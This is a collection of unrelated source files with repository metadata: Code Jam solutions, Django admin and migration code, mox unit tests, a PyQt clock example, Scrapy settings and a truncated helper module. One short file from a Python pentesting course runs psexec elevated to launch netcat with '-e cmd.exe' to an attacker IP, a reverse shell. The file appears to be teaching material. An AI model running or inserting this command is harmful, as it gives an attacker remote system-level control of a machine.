69825a5a9bffc35dd9540519400ec2f710db6246 | 6b2a8dd202fdce77c971c412717e305e1caaac51 | /solutions_5670465267826688_1/Python/cvarad/abc.py | 1720f7c8ffacfd6974b6e997e64ca36d68e8cbc7 | [] | no_license | alexandraback/datacollection | 0bc67a9ace00abbc843f4912562f3a064992e0e9 | 076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf | refs/heads/master | 2021-01-24T18:27:24.417992 | 2017-05-23T09:23:38 | 2017-05-23T09:23:38 | 84,313,442 | 2 | 4 | null | null | null | null | UTF-8 | Python | false | false | 2,505 | py | mult = {('j', '1'): 'j', ('k', 'i'): 'j', ('1', 'j'): 'j', ('1', '1'): '1', ('k', 'j'): '-i', ('1', 'k'): 'k', ('k', 'k'): '-1', ('j', 'i'): '-k', ('k', '1'): 'k', ('i', 'j'): 'k', ('1', 'i'): 'i', ('i', 'k'): '-j', ('j', 'k'): 'i', ('i', 'i'): '-1', ('i', '1'): 'i', ('j', 'j'): '-1'}
def multiply(x, y):
if x[0] == '-' and y[0] != '-':
res = mult[x[1], y]
if res[0] == '-':
res = res[1]
else:
res = '-' + res
return res
if x[0] != '-' and y[0] == '-':
res = mult[x, y[1]]
if res[0] == '-':
res = res[1]
else:
res = '-' + res
return res
if x[0] == '-' and y[0] == '-':
return mult[x[1], y[1]]
return mult[x, y]
if __name__ == '__main__':
t = input()
for i in range(1, t+1):
l, x = map(int, raw_input().split())
s = raw_input()
if l*x < 3 or len(set(s)) == 1:
print "Case #" + str(i) + ": NO"
continue
if x <= 4:
s = s*x
found = 0
first = '1'
index = 0
for a in range(0, len(s)-2):
first = multiply(first, s[a])
if first == 'i':
found = 1
index = a
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
found = 0
first = '1'
for b in range(index+1, len(s)-1):
first = multiply(first, s[b])
if first == 'j':
found = 1
index = b
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
first = '1'
for c in range(index+1, len(s)):
first = multiply(first, s[c])
if first == 'k':
print "Case #" + str(i) + ": YES"
else:
print "Case #" + str(i) + ": NO"
else:
copy_s = s
s = copy_s*4
x -= 4
found = 0
first = '1'
index = 0
for a in range(0, len(s)):
first = multiply(first, s[a])
if first == 'i':
found = 1
index = a
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
if x >= 4:
s = s[index+1:] + copy_s*4
x -= 4
else:
s = s[index+1:] + copy_s*x
x = 0
found = 0
first = '1'
for b in range(0, len(copy_s)*4):
first = multiply(first, s[b])
if first == 'j':
found = 1
index = b
break
if found == 0:
print "Case #" + str(i) + ": NO"
continue
s = s[index+1:] + copy_s*(x%4)
first = '1'
for c in range(0, len(s)):
first = multiply(first, s[c])
if first == 'k':
print "Case #" + str(i) + ": YES"
else:
print "Case #" + str(i) + ": NO" | [
"eewestman@gmail.com"
] | eewestman@gmail.com |
1bea2d0ad3996f39218a58d6b1b0ab794fe1b9d9 | c00f701c7d4f765b1be9c0a1d68861551b063185 | /pages/admin.py | 9fd844fc98e431223bb9e097241c2404a0b613f6 | [] | no_license | Aditta-das/vege | f52921de10e492b775defc0f698cc784e011f1a9 | 881d99de1ae44787d504b1bb3647c873b7e7a32f | refs/heads/master | 2020-12-23T19:50:18.570462 | 2020-01-30T17:11:07 | 2020-01-30T17:11:07 | 237,255,549 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 305 | py | from django.contrib import admin
from .models import Detail, Comment
# Register your models here.
class Admin(admin.ModelAdmin):
list_display = ('id', 'title', 'category', 'is_stock', 'price')
list_display_links = ('id', 'title')
admin.site.register(Detail, Admin)
admin.site.register(Comment)
| [
"ndas5662@gmail.com"
] | ndas5662@gmail.com |
dccf38d64ab43cb8022c1097d9c82acdc491b23a | b09920ecdce8ab84df6a3b24b420d14c2c846078 | /GrantHolders/migrations/0002_auto_20201226_1723.py | fb6fab5051eec95566994b38a46b86eaa5c75baa | [] | no_license | BakdauletBolatE/sciense2020 | becdf64a3ecdfd35651b34cc045e09ee6ca804b9 | 4ed24162c056fc95bf8c02800116eddaf48c6387 | refs/heads/main | 2023-02-11T15:13:52.307403 | 2021-01-02T12:46:05 | 2021-01-02T12:46:05 | 324,537,781 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 787 | py | # Generated by Django 3.1.4 on 2020-12-26 17:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('GrantHolders', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='grantholders',
name='poster',
field=models.ImageField(upload_to='graduate_img/', verbose_name='Грант иегерінің суреті'),
),
migrations.AlterField(
model_name='grantholders',
name='subject',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='GrantHolders.subject', verbose_name='Грант иегерінің пәні'),
),
]
| [
"bakosh21345@gmail.com"
] | bakosh21345@gmail.com |
657e83359651d28d59d3c8c43f3f9ecfd7ae5c7a | b45d66c2c009d74b4925f07d0d9e779c99ffbf28 | /tests/unit_tests/core_tests/service_tests/main_tests/test_main_retail_input_endpoints.py | 5b43f5ae98c9a1212f70f561e05c1f1ea8ed82b7 | [] | no_license | erezrubinstein/aa | d96c0e39762fe7aaeeadebbd51c80b5e58576565 | a3f59ba59519183257ed9a731e8a1516a4c54b48 | refs/heads/master | 2021-03-12T23:44:56.319721 | 2016-09-18T23:01:17 | 2016-09-18T23:01:17 | 22,665,501 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,352 | py | from core.service.svc_main.implementation.service_endpoints.retail_input_endpoints import RetailInputEndpoints
from core.service.svc_main.implementation.service_endpoints.endpoint_field_data import *
from common.helpers.common_dependency_helper import register_common_mox_dependencies
from common.utilities.inversion_of_control import dependencies, Dependency
import json
import mox
__author__ = 'vgold'
class RetailInputEndpointsTests(mox.MoxTestBase):
def setUp(self):
# call parent set up
super(RetailInputEndpointsTests, self).setUp()
# register mock dependencies
register_common_mox_dependencies(self.mox)
# get several dependencies that we'll need in the class
self.mock_main_access = Dependency("CoreAPIProvider").value
# Set mock attributes on WorkflowService instance for calls to record
self.mock = self.mox.CreateMock(RetailInputEndpoints)
self.mock.main_access = self.mox.CreateMockAnything()
self.mock.main_access.wfs = self.mox.CreateMockAnything()
self.mock.main_access.mds = self.mox.CreateMockAnything()
self.mock.main_param = self.mox.CreateMockAnything()
self.mock.em_access = self.mox.CreateMockAnything()
self.mock.excel_helper = self.mox.CreateMockAnything()
self.mock.cache_rec_options = {"has_metadata": True}
self.mock.store_helper = self.mox.CreateMockAnything()
self.mock.rir_helper = self.mox.CreateMockAnything()
self.mock.address_helper = self.mox.CreateMockAnything()
self.mock.WorkflowTaskGroup = self.mox.CreateMockAnything()
self.mock.CompanyInfo = self.mox.CreateMockAnything()
self.mock.SingleRirAdder = self.mox.CreateMockAnything()
self.mock.QCTaskCreator = self.mox.CreateMockAnything()
self.mock.RetailInputFileUploader = self.mox.CreateMockAnything()
self.mock.WorkflowNextTaskGetter = self.mox.CreateMockAnything()
# Set mock attributes on WorkflowService instance for calls to ignore
self.mock.cfg = Dependency("MoxConfig").value
self.mock.logger = Dependency("FlaskLogger").value
# Create caller context
self.context = {"user_id": 1, "source": "test_main_retail_input_endpoints.py",
"user": {"user_id": 1, "is_generalist": False},
"team_industries": ["asdf"]}
def doCleanups(self):
super(RetailInputEndpointsTests, self).doCleanups()
dependencies.clear()
##########################################################################
# RetailInputEndpoints.get_preset_retail_input_summary_collections()
def test_get_preset_retail_input_summary_collections(self):
request = self.mox.CreateMockAnything()
params = {"helo": "moto"}
request.args = {"params": json.dumps(params), "context": json.dumps(self.context)}
paging_params = {"paging_params": "paging_params"}
self.mock._format_page_and_sort_params(params, field_list = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS).AndReturn(paging_params)
query = {"query": "query"}
self.mock._format_query_from_field_filters(RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
RETAIL_INPUT_SUMMARY_TASK_GROUP_SEARCHABLE_DB_FIELDS,
params).AndReturn(query)
params = dict(paging_params, query = query, fields = RETAIL_INPUT_SUMMARY_TASK_GROUP_DB_FIELDS)
data = "data"
self.mock.main_access.wfs.call_task_group_data(self.context, params).AndReturn(data)
self.mox.ReplayAll()
results = RetailInputEndpoints.get_preset_retail_input_summary_collections(self.mock, request)
self.assertEqual(results, data)
##########################################################################
# RetailInputEndpoints.post_retail_input_add_one_record()
def test_post_retail_input_add_one_record(self):
data = "data"
files = "files"
single_rir_adder = self.mox.CreateMockAnything()
self.mock.SingleRirAdder(data, files, self.context, async=True).AndReturn(single_rir_adder)
single_rir_adder.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_add_one_record(self.mock, data, files, self.context, True)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.post_retail_input_record_validation_create_qc()
def test_post_retail_input_record_validation_create_qc(self):
data = "data"
qc_task_creator = self.mox.CreateMockAnything()
self.mock.QCTaskCreator(data, self.context).AndReturn(qc_task_creator)
qc_task_creator.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_record_validation_create_qc(self.mock, data, self.context)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.post_retail_input_file_upload()
def test_post_retail_input_file_upload(self):
data = "data"
files = "files"
rif_uploader = self.mox.CreateMockAnything()
self.mock.RetailInputFileUploader(data, files, self.context).AndReturn(rif_uploader)
rif_uploader.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.post_retail_input_file_upload(self.mock, data, files, self.context)
self.assertEqual('a', results)
##########################################################################
# RetailInputEndpoints.get_preset_retail_input_record_validation_next_target()
def test_get_preset_retail_input_record_validation_next_target(self):
query = "query"
workflow_next_task_getter = self.mox.CreateMockAnything()
self.mock.WorkflowNextTaskGetter(query, self.context).AndReturn(workflow_next_task_getter)
workflow_next_task_getter.run().AndReturn("a")
self.mox.ReplayAll()
results = RetailInputEndpoints.get_preset_retail_input_record_validation_next_target(self.mock, query, self.context)
self.assertEqual('a', results)
| [
"erezrubinstein@hotmail.com"
] | erezrubinstein@hotmail.com |
7ec822625c92375e8d896e391d9e29f135d560bf | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_135/1016.py | ddf1fa1b653fea35088b6d3fe64db5a02aa39fff | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 622 | py | # -*- coding: utf-8 -*-
f = open("A-small-attempt0.in")
T = int(f.readline())
for t in range(T):
a = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == a:
firstset = set(map(int, s.split(" ")))
b = int(f.readline())
for i in range(1, 5):
s = f.readline()
if i == b:
secondset = set(map(int, s.split(" ")))
dup = firstset & secondset
print "Case #%d:" %(t+1),
if len(dup) == 0:
print "Volunteer cheated!"
elif len(dup) == 1:
print dup.pop()
else:
print "Bad magician!"
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
94acf1ea1faefa3016f2d23ef45c62315e312dda | dbf76237e39087bf1a73243bbb019710182be0e4 | /Capitulo 2/28 - autoridade2.py | 0446ac6eb10b20550fa18cfc8fd429680b9e8601 | [] | no_license | sandromelobrazil/Python_Para_Pentest | 52edd86fa5929e0303e60e9872c027aae564becd | 1837b523ad55e1c8ca066341459714e2fc88f037 | refs/heads/master | 2020-04-05T16:56:22.342925 | 2018-11-11T00:52:23 | 2018-11-11T00:52:23 | 157,035,879 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 191 | py | import ctypes
ctypes.windll.shell32.ShellExecuteW(None, u"runas", u"psexec.exe",
u"-accepteula -nobanner -s -d C:\\Users\\usuario\\Desktop\\nc.exe IP_do_atacante 666 -e cmd.exe", None, 0) | [
"sandromelo.brazil@gmail.com"
] | sandromelo.brazil@gmail.com |
2e24114040a5492d2a20aa1dd70e6205c6b0a72d | 806bf6a28854da12df7fad1deefa175f4e974ad6 | /visualization/c2.2.25.py | 6d7b77a2406ca6f0844169ce7bb3968c0b62250e | [] | no_license | qliu0/PythonInAirSeaScience | ba613e61ce331e5e2b4b5c0045f0223cde42718b | 1c8d5fbf3676dc81e9f143e93ee2564359519b11 | refs/heads/master | 2023-08-28T08:24:15.894918 | 2021-08-26T12:26:58 | 2021-08-26T12:26:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 772 | py | from mpl_toolkits.basemap import Basemap
import numpy as np
import matplotlib.pyplot as plt
# lat_1、lat_2 分别是第一、二标准纬线
m = Basemap(width=12000000,height=9000000,\
resolution='l',projection='eqdc',\
lat_1=45.,lat_2=55,lat_0=50,lon_0=108.)
m.drawcoastlines()
m.fillcontinents(color='y',lake_color='c')
m.drawparallels(np.arange(-80.,81.,20.))
m.drawmeridians(np.arange(0.,361.,20.))
m.drawmapboundary(fill_color='c')
ax = plt.gca()
for y in np.linspace(m.ymax/20,19*m.ymax/20,9):
for x in np.linspace(m.xmax/20,19*m.xmax/20,12):
lon, lat = m(x,y,inverse=True)
poly = m.tissot(lon,lat,2.,100,\
facecolor='red',zorder=10,alpha=0.5)
plt.title("Equidistant Conic Projection")
plt.show()
| [
"queensbarry@foxmail.com"
] | queensbarry@foxmail.com |
afb3a5e9967dbe9b0e8519795602b3cb86d2e631 | 39fa2df1ab72444f3fe62d29c2dd146fbcdff564 | /test1/MyDjangoSite/myTest/views.py | 1b8c643053f6869de091845b2306c03bae1a14f1 | [] | no_license | gaozhidf/django | faa6c3f623075efc9c30f039ae93c8d02decb085 | 8526c2b33cc41dee9a636d126366990fb502834b | refs/heads/master | 2021-01-01T17:15:52.834568 | 2015-08-13T09:26:26 | 2015-08-13T09:26:26 | 40,441,228 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 290 | py | from django.shortcuts import render
# Create your views here.
from django.http import HttpResponse, Http404
def hello(request):
return HttpResponse("Hello world")
def hello1(request, num):
try:
num = int(num)
HttpResponse("Hello world too")
except ValueError:
raise Http404() | [
"gaozhidf@gmail.com"
] | gaozhidf@gmail.com |
e0b92735daaf2063e1e568e4174e38dfd2c19568 | 55c250525bd7198ac905b1f2f86d16a44f73e03a | /Python/Projects/twilio/build/lib/twilio/rest/api/v2010/account/conference/participant.py | b7979a9d6f17baa5d7fd2d1d56c1a25272656037 | [
"LicenseRef-scancode-other-permissive"
] | permissive | NateWeiler/Resources | 213d18ba86f7cc9d845741b8571b9e2c2c6be916 | bd4a8a82a3e83a381c97d19e5df42cbababfc66c | refs/heads/master | 2023-09-03T17:50:31.937137 | 2023-08-28T23:50:57 | 2023-08-28T23:50:57 | 267,368,545 | 2 | 1 | null | 2022-09-08T15:20:18 | 2020-05-27T16:18:17 | null | UTF-8 | Python | false | false | 130 | py | version https://git-lfs.github.com/spec/v1
oid sha256:517e39235cd9a18aa43315a0f2243a0b6f051535285cb71b5db98d5aec53da01
size 30162
| [
"nateweiler84@gmail.com"
] | nateweiler84@gmail.com |
3b15727e1ace910554d9e47e1fc36e68e74aabc0 | c2002f5451a52450db536088cf1f4beec9d23d7f | /0x1C-makefiles/5-island_perimeter.py | 8032bfe4825143c89eebadc851220ba5e6f3a2c5 | [] | no_license | JulianCanoDev/holbertonschool-low_level_programming | d23e10cb14d4cf5bffcb8601bb2e4a7eaf3c3038 | 6484d00870b0578a8acaba0ff125bf2e476828dc | refs/heads/master | 2021-07-12T21:10:35.513238 | 2021-06-22T22:25:17 | 2021-06-22T22:25:17 | 238,518,191 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 540 | py | #!/usr/bin/python3
"""
Defines an island perimeter measuring
"""
def island_perimeter(grid):
"""
Return the perimiter of an island
"""
width = len(grid[0])
height = len(grid)
edges = 0
size = 0
for i in range(height):
for j in range(width):
if grid[i][j] == 1:
size += 1
if (j > 0 and grid[i][j - 1] == 1):
edges += 1
if (i > 0 and grid[i - 1][j] == 1):
edges += 1
return size * 4 - edges * 2
| [
"juliancano.dev@gmail.com"
] | juliancano.dev@gmail.com |
661c565ec03275a3d21d78d26923358819478938 | b683c8f1942a1ab35062620c6013b1e223c09e92 | /Python-Files/Day-21/Question-87-alternative-solution-2.py | d1f23c21c0e660f4e332852acd43bab6779845c7 | [] | no_license | nihathalici/Break-The-Ice-With-Python | 601e1c0f040e02fe64103c77795deb2a5d8ff00a | ef5b9dd961e8e0802eee171f2d54cdb92f2fdbe8 | refs/heads/main | 2023-07-18T01:13:27.277935 | 2021-08-27T08:19:44 | 2021-08-27T08:19:44 | 377,414,827 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 426 | py | """
Question 87
Question
With two given lists [1,3,6,78,35,55] and [12,24,35,24,88,120,155],
write a program to make a list whose elements are
intersection of the above given lists.
Hints
Use set() and "&=" to do set intersection operation.
"""
list1 = [1, 3, 6, 78, 35, 55]
list2 = [12, 24, 35, 24, 88, 120, 155]
set1 = set(list1)
set2 = set(list2)
intersection = set.intersection(set1, set2)
print(list(intersection))
| [
"noreply@github.com"
] | nihathalici.noreply@github.com |
4f3d07f153b1f95a64a58781bc02da8823cfab74 | 376e2608fcedd1407d8c2a65634220984bbd9b85 | /alpenbank/settings.py | 1ba723fa8566bcf23684c4aa5e5a47d21f914256 | [] | no_license | SimeonYS/alpenbank | c2128697deab2c4f2fd97ea87ac7810cf889ebab | a0f46ad71cde350bec4e30a851708428e32be72e | refs/heads/main | 2023-03-09T09:11:26.534659 | 2021-02-23T11:42:00 | 2021-02-23T11:42:00 | 341,535,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | BOT_NAME = 'alpenbank'
SPIDER_MODULES = ['alpenbank.spiders']
NEWSPIDER_MODULE = 'alpenbank.spiders'
FEED_EXPORT_ENCODING = 'utf-8'
LOG_LEVEL = 'ERROR'
DOWNLOAD_DELAY = 0
USER_AGENT="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36"
ROBOTSTXT_OBEY = True
ITEM_PIPELINES = {
'alpenbank.pipelines.AlpenbankPipeline': 300,
} | [
"simeon.simeonov@ADPVT.com"
] | simeon.simeonov@ADPVT.com |
e4e175743927d2d38466815d4429550bd4380b0f | a5a99f646e371b45974a6fb6ccc06b0a674818f2 | /RecoJets/JetProducers/python/fixedGridRhoProducer_cfi.py | 6f9ee1ae1a6df7a91ece5014cdba4413192be8b4 | [
"Apache-2.0"
] | permissive | cms-sw/cmssw | 4ecd2c1105d59c66d385551230542c6615b9ab58 | 19c178740257eb48367778593da55dcad08b7a4f | refs/heads/master | 2023-08-23T21:57:42.491143 | 2023-08-22T20:22:40 | 2023-08-22T20:22:40 | 10,969,551 | 1,006 | 3,696 | Apache-2.0 | 2023-09-14T19:14:28 | 2013-06-26T14:09:07 | C++ | UTF-8 | Python | false | false | 497 | py | import FWCore.ParameterSet.Config as cms
fixedGridRhoCentral = cms.EDProducer("FixedGridRhoProducer",
pfCandidatesTag = cms.InputTag("particleFlow"),
EtaRegion = cms.string("Central")
)
fixedGridRhoForward = cms.EDProducer("FixedGridRhoProducer",
pfCandidatesTag = cms.InputTag("particleFlow"),
EtaRegion = cms.string("Forward")
)
fixedGridRhoAll = cms.EDProducer("FixedGridRhoProducer",
pfCandidatesTag = cms.InputTag("particleFlow"),
EtaRegion = cms.string("All")
)
| [
"giulio.eulisse@gmail.com"
] | giulio.eulisse@gmail.com |
c4695c901a02a94e112fab81598f233dc0534459 | fcaa0395a7c6aa74cbc47c40f35fdc312e44b9c5 | /aok/comparisons/__init__.py | 00898d6b19afe33e80500e988e0cc24bd6dfcf91 | [] | no_license | rocketboosters/a-ok | b6f1a70d262123c2df5e4969a687cbcfdfbafc8c | 06f31404a4ce34d561253ba74b533ce3fb73c60c | refs/heads/main | 2023-09-02T19:18:18.158296 | 2021-11-03T01:54:36 | 2021-11-03T01:54:36 | 388,142,177 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,275 | py | """Comparison operators subpackage for the aok library."""
from aok.comparisons._basics import Anything # noqa: F401
from aok.comparisons._basics import Between # noqa: F401
from aok.comparisons._basics import Equals # noqa: F401
from aok.comparisons._basics import Greater # noqa: F401
from aok.comparisons._basics import GreaterOrEqual # noqa: F401
from aok.comparisons._basics import Less # noqa: F401
from aok.comparisons._basics import LessOrEqual # noqa: F401
from aok.comparisons._basics import NoneOf # noqa: F401
from aok.comparisons._basics import OneOf # noqa: F401
from aok.comparisons._basics import Unequals # noqa: F401
from aok.comparisons._basics import anything # noqa: F401
from aok.comparisons._basics import between # noqa: F401
from aok.comparisons._basics import equals # noqa: F401
from aok.comparisons._basics import greater # noqa: F401
from aok.comparisons._basics import greater_or_equal # noqa: F401
from aok.comparisons._basics import less # noqa: F401
from aok.comparisons._basics import less_or_equal # noqa: F401
from aok.comparisons._basics import none_of # noqa: F401
from aok.comparisons._basics import one_of # noqa: F401
from aok.comparisons._basics import unequals # noqa: F401
from aok.comparisons._dicts import Dict # noqa: F401
from aok.comparisons._dicts import Okay # noqa: F401
from aok.comparisons._lists import JsonList # noqa: F401
from aok.comparisons._lists import List # noqa: F401
from aok.comparisons._lists import OkayList # noqa: F401
from aok.comparisons._lists import StrictList # noqa: F401
from aok.comparisons._lists import Tuple # noqa: F401
from aok.comparisons._lists import json_list # noqa: F401
from aok.comparisons._nullish import NotNull # noqa: F401
from aok.comparisons._nullish import Optional # noqa: F401
from aok.comparisons._nullish import not_null # noqa: F401
from aok.comparisons._nullish import optional # noqa: F401
from aok.comparisons._strings import Like # noqa: F401
from aok.comparisons._strings import LikeCase # noqa: F401
from aok.comparisons._strings import Match # noqa: F401
from aok.comparisons._strings import like # noqa: F401
from aok.comparisons._strings import like_case # noqa: F401
from aok.comparisons._strings import match # noqa: F401
| [
"swernst@gmail.com"
] | swernst@gmail.com |
2acf663118eb22264c326d53e1cc3e0f86209fce | d737fa49e2a7af29bdbe5a892bce2bc7807a567c | /software/qt_examples/src/pyqt-official/widgets/shapedclock.py | 0c1c44b50df3de59c7adebb087f4f9d2b396d3f4 | [
"GPL-3.0-only",
"MIT",
"CC-BY-NC-SA-4.0",
"GPL-1.0-or-later"
] | permissive | TG-Techie/CASPER | ec47dfbfd6c3a668739ff4d707572e0b853518b4 | 2575d3d35e7dbbd7f78110864e659e582c6f3c2e | refs/heads/master | 2020-12-19T12:43:53.825964 | 2020-01-23T17:24:04 | 2020-01-23T17:24:04 | 235,736,872 | 0 | 1 | MIT | 2020-01-23T17:09:19 | 2020-01-23T06:29:10 | Python | UTF-8 | Python | false | false | 5,194 | py | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import QPoint, QSize, Qt, QTime, QTimer
from PyQt5.QtGui import QColor, QPainter, QPolygon, QRegion
from PyQt5.QtWidgets import QAction, QApplication, QWidget
class ShapedClock(QWidget):
hourHand = QPolygon([
QPoint(7, 8),
QPoint(-7, 8),
QPoint(0, -40)
])
minuteHand = QPolygon([
QPoint(7, 8),
QPoint(-7, 8),
QPoint(0, -70)
])
hourColor = QColor(127, 0, 127)
minuteColor = QColor(0, 127, 127, 191)
def __init__(self, parent=None):
super(ShapedClock, self).__init__(parent,
Qt.FramelessWindowHint | Qt.WindowSystemMenuHint)
timer = QTimer(self)
timer.timeout.connect(self.update)
timer.start(1000)
quitAction = QAction("E&xit", self, shortcut="Ctrl+Q",
triggered=QApplication.instance().quit)
self.addAction(quitAction)
self.setContextMenuPolicy(Qt.ActionsContextMenu)
self.setToolTip("Drag the clock with the left mouse button.\n"
"Use the right mouse button to open a context menu.")
self.setWindowTitle(self.tr("Shaped Analog Clock"))
def mousePressEvent(self, event):
if event.button() == Qt.LeftButton:
self.dragPosition = event.globalPos() - self.frameGeometry().topLeft()
event.accept()
def mouseMoveEvent(self, event):
if event.buttons() == Qt.LeftButton:
self.move(event.globalPos() - self.dragPosition)
event.accept()
def paintEvent(self, event):
side = min(self.width(), self.height())
time = QTime.currentTime()
painter = QPainter(self)
painter.setRenderHint(QPainter.Antialiasing)
painter.translate(self.width() / 2, self.height() / 2)
painter.scale(side / 200.0, side / 200.0)
painter.setPen(Qt.NoPen)
painter.setBrush(ShapedClock.hourColor)
painter.save()
painter.rotate(30.0 * ((time.hour() + time.minute() / 60.0)))
painter.drawConvexPolygon(ShapedClock.hourHand)
painter.restore()
painter.setPen(ShapedClock.hourColor)
for i in range(12):
painter.drawLine(88, 0, 96, 0)
painter.rotate(30.0)
painter.setPen(Qt.NoPen)
painter.setBrush(ShapedClock.minuteColor)
painter.save()
painter.rotate(6.0 * (time.minute() + time.second() / 60.0))
painter.drawConvexPolygon(ShapedClock.minuteHand)
painter.restore()
painter.setPen(ShapedClock.minuteColor)
for j in range(60):
if (j % 5) != 0:
painter.drawLine(92, 0, 96, 0)
painter.rotate(6.0)
def resizeEvent(self, event):
side = min(self.width(), self.height())
maskedRegion = QRegion(self.width()/2 - side/2, self.height()/2 - side/2, side, side, QRegion.Ellipse)
self.setMask(maskedRegion)
def sizeHint(self):
return QSize(100, 100)
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
clock = ShapedClock()
clock.show()
sys.exit(app.exec_())
| [
"TGTechie01@gmail.com"
] | TGTechie01@gmail.com |
7aa75076d646b49b3ef2cc13d97d1040ad806a7e | e8790304ded051df1d6bce56e2a5df32b2a8bd71 | /eshop/cart/forms.py | b0489422ab83f7a8647ce15df7868070e106b02a | [] | no_license | puskarkarki/TrialEcommerce | d5769c348937f66d6a8d7bd25eef4fc581856219 | a8afd83a93c6299b5505b23d74d8740e3ee66928 | refs/heads/master | 2023-08-31T23:43:25.965510 | 2021-09-22T12:09:30 | 2021-09-22T12:09:30 | 405,687,882 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 315 | py | from django import forms
PRODUCT_QUANTITY_OPTIONS = [(i, str(i)) for i in range(1, 100)]
class AddProductToCartForm(forms.Form):
quantity = forms.TypedChoiceField(choices=PRODUCT_QUANTITY_OPTIONS, coerce=int)
override = forms.BooleanField(required=False, initial=False, widget=forms.HiddenInput)
| [
"puskarrajkarki1234@gmail.com"
] | puskarrajkarki1234@gmail.com |
50986868ac3beda7336d080eb3fedccbd1f18816 | e89693a2906534fa4a9d180b404cb96751302e8c | /reference_info.py | de35a29f7f6ccdf45cf70a74977b76abd0910368 | [] | permissive | friedrich-schotte/Lauecollect | e278e00692d109e98450c27502986673bf59db6a | acfc5afe34b4df5891a0f8186b8df76625afb51d | refs/heads/master | 2022-09-12T02:59:04.363963 | 2022-08-18T16:39:01 | 2022-08-18T16:39:01 | 186,062,944 | 0 | 2 | MIT | 2020-07-20T02:04:07 | 2019-05-10T22:42:26 | Python | UTF-8 | Python | false | false | 3,529 | py | """
Author: Friedrich Schotte
Date created: 2022-06-23
Date last modified: 2022-06-23
Revision comment:
"""
__version__ = "1.0"
import logging
from threading import Lock
def reference_info(reference, payload_type, *args, **kwargs):
container = attribute_or_item_reference_container(reference)
payload_name = payload_type.__name__.lower()
if not hasattr(container, payload_name):
with container.lock:
if not hasattr(container, payload_name):
new_payload = payload_type(*args, **kwargs)
setattr(container, payload_name, new_payload)
payload = getattr(container, payload_name)
return payload
def attribute_or_item_reference_container(reference):
if hasattr(reference, "attribute_name"):
attribute_info_base = attribute_reference_container(reference)
elif hasattr(reference, "index"):
attribute_info_base = item_reference_container(reference)
else:
raise AttributeError(f"{reference} is missing attributes 'attribute_name' or 'index'")
return attribute_info_base
def attribute_reference_container(reference):
obj = reference.object
attribute_name = f"__{reference.attribute_name}__info__"
if not hasattr(obj, attribute_name):
with attribute_info_lock(obj):
if not hasattr(obj, attribute_name):
# logging.debug(f"{obj}.{attribute_name} = {Container()}")
